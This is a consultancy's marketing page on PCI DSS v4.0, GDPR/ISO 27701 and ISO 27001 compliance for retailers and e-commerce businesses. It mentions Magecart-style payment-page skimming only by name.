Security and Compliance for Retail & E-commerce
Retail and e-commerce organisations face a convergence of compliance obligations: PCI DSS for payment card processing, GDPR for customer data, and ISO 27001 for enterprise supplier qualification and cyber insurance requirements. BALTUM provides integrated programmes that address all three efficiently — with particular expertise in e-commerce payment flows and retail supply chain security.
PCI DSS v4.0 for Retailers
Any retailer that stores, processes, or transmits cardholder data must comply with PCI DSS — including e-commerce platforms using payment pages, point-of-sale systems, and card-not-present transaction processing. PCI DSS v4.0's new e-commerce requirements (Requirement 6.4) specifically target the security of payment pages against client-side skimming attacks (Magecart-style attacks).
GDPR for E-commerce
E-commerce operations involve extensive personal data collection: purchase histories, browsing behaviour, customer profiles, loyalty programme data, and payment information. GDPR imposes strict requirements on consent, data retention, profiling, and cross-border data transfers — with significant fines for non-compliance. ISO 27701 certification provides the documented GDPR accountability framework demanded by regulators and institutional partners.
Cyber Insurance and ISO 27001
Cyber insurance underwriters now routinely require ISO 27001 certification or equivalent controls documentation as a precondition for coverage — or as a factor in premium calculation. ISO 27001 certification also satisfies payment network security requirements for merchants processing high transaction volumes.